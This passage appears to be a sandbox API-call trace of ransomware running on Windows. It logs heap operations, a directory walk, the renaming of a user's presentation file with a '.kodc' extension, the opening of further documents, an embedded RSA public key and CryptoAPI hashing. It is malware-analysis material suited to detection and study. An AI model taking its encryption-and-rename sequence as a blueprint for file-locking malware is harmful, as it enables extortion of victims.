(HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8b0 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a568 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a880 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c540 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a880 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x32cef08 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.104] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.104] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a868 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a850 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33404e8 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.106] WriteFile (in: hFile=0x5cc, lpBuffer=0x9b9b950*, nNumberOfBytesToWrite=0x27d5, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9b9b950*, lpNumberOfBytesWritten=0x9e2fb14*=0x27d5, lpOverlapped=0x0) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9b950 | out: hHeap=0x630000) returned 1 [0098.106] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x27da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.106] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0098.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.106] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.106] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.106] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.106] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.106] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.107] CloseHandle (hObject=0x5cc) returned 1 [0098.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.107] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x692d18 | out: hHeap=0x630000) returned 1 [0098.107] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ac56VePDrCIq.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ac56vepdrciq.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ac56VePDrCIq.pptx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ac56vepdrciq.pptx.kodc")) returned 1 [0098.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.111] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.111] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.112] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9079b780, ftCreationTime.dwHighDateTime=0x1d5b82e, ftLastAccessTime.dwLowDateTime=0x9d0c3c20, ftLastAccessTime.dwHighDateTime=0x1d5bbe4, ftLastWriteTime.dwLowDateTime=0x9d0c3c20, ftLastWriteTime.dwHighDateTime=0x1d5bbe4, nFileSizeHigh=0x0, nFileSizeLow=0x139bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AXprvG.ots", cAlternateFileName="")) returned 1 [0098.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce0d0 [0098.112] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.112] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce0d0 | out: hHeap=0x630000) returned 1 [0098.112] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AXprvG.ots") returned=".ots" [0098.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\AXprvG.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\axprvg.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.112] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=80315) returned 1 [0098.113] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.115] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13995, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.115] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.116] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.116] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.116] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.116] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x139bb, lpOverlapped=0x0) returned 1 [0098.117] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.117] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.117] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.117] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.117] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.118] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.118] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.118] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.118] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.118] GetLastError () returned 0x0 [0098.118] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.118] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.118] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.118] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.118] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.118] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.118] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x139c0) returned 0x9ba4d90 [0098.119] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x33404e8 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a850 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x32d6480 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a868 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.119] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.119] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0098.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.119] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a8b0 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a898 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a8b0 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a898 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0098.120] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.120] GetCurrentThreadId () returned 0x42c [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8e4b8 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.120] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.121] GetCurrentThreadId () returned 0x42c [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318ea0 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a898 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0098.121] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0098.121] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a8b0 [0098.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0098.122] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.122] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | 